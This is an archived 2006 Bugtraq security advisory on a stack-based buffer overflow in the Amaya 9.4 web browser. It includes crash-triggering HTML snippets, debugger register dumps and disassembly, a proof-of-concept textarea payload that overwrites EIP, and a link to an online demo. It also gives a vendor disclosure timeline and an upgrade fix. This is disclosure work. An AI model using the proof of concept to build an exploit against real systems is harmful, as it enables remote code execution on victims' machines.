[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4

From: bugtraq@xxxxxxxxxxxx
Date: 12 Apr 2006 23:31:32 -0000

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

---------------------------------------------------
| BuHa Security-Advisory #10 | Apr 12th, 2006 |
---------------------------------------------------
| Vendor | W3C's Amaya |
| URL | http://www.w3.org/Amaya/ |
| Version | <= 9.4 |
| Risk | Critical (Remote Code Execution) |
---------------------------------------------------

o Description:
=============

The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).

See the "Amaya Overview" page [1] for more details.

o Stack overflow:
================

Both of the two below posted code snippets (in fact there are dozens
of possible snippets but all of them trigger the same bug) force
Amaya 9.4 to crash:

<colgroup compact="Ax200">
[...]
<textarea rows="Ax200">

After the first glance at the generated error report and respectively
the ASM code during the access violation I thought I came across a
heap based buffer overflow.

eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206

004edd61 03f3 add esi,ebx
004edd63 a4 movsb
004edd64 8b4500 mov eax,[ebp]
004edd67 8b8c241c010000 mov ecx,[esp+0x11c]
004edd6e 8b942418010000 mov edx,[esp+0x118]
004edd75 50 push eax
004edd76 51 push ecx
004edd77 53 push ebx
004edd78 52 push edx
004edd79 e8a23c0200 call amaya+0x111a20 (00511a20)
004edd7e 53 push ebx
004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0)
004edd84 83c428 add esp,0x28
004edd87 8bbc24fc000000 mov edi,[esp+0xfc]
004edd8e 8b942400010000 mov edx,[esp+0x100]
FAULT ->004edd95 8b4240 mov eax,[edx+0x40]
ds:0023:41414181=????????
004edd98 83f844 cmp eax,0x44
004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8)
004edda1 837c242457 cmp dword ptr [esp+0x24],0x57
004edda6 0f8465060000 je amaya+0xee411 (004ee411)
004eddac 8b4500 mov eax,[ebp]
004eddaf 8b8c2408010000 mov ecx,[esp+0x108]
004eddb6 6aff push 0xff
004eddb8 50 push eax
004eddb9 51 push ecx
004eddba 57 push edi
004eddbb e8d33af1ff call amaya+0x1893 (00401893)
004eddc0 83c410 add esp,0x10
004eddc3 5f pop edi
004eddc4 5e pop esi
004eddc5 5d pop ebp

After a second, more precise look, the evitable heap overflow turned
out to be a stack based overflow..

We are able to control the EIP:

<textarea rows=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>

eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000

Function: <nosymbols>
No prior disassembly possible
42424242 ?? ???
42424244 ?? ???
42424246 ?? ???
42424248 ?? ???
4242424a ?? ???
4242424c ?? ???

Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html

In fact, sucessful exploitation of this vulnerability is not that easy
because non-text characters were modfified during parsing therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.

o Disclosure Timeline:
=====================

21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:
==========

Upgrade to the latest version of Amaya. [2]

o Credits:
=========

Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:
http://morph3us.org/advisories/20060412-amaya-94.txt

[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEPYALkCo6/ctnOpYRA5yzAJ9j/ki1dPCxPToftjLYHTUkCoGzyACfffaM
zCHSYS6ScvGJcRjuzqovGv4=
=wD6S
-----END PGP SIGNATURE-----

Prev by Date: [eVuln] qliteNews SQL Injection Vulnerability
Next by Date: [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2
Previous by thread: [eVuln] qliteNews SQL Injection Vulnerability
Next by thread: [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2
Index(es):
- Date
- Thread

Relevant Pages

[NEWS] Amaya Multiple Buffer Overflows
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Amaya Multiple Buffer Overflows ... 004edd67 8b8c241c010000 mov ecx, ... Successful exploitation of this vulnerability is not that easy because ...
(Securiteam)
[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2
... It supports HTML 4.01, XHTML 1.0, XHTML ... The following code snippet forces Amaya 9.4 to crash: ... sucessful exploitation of this vulnerability is not that easy ... 23 Feb 06 - Vendor confirmed vulnerability. ...
(Bugtraq)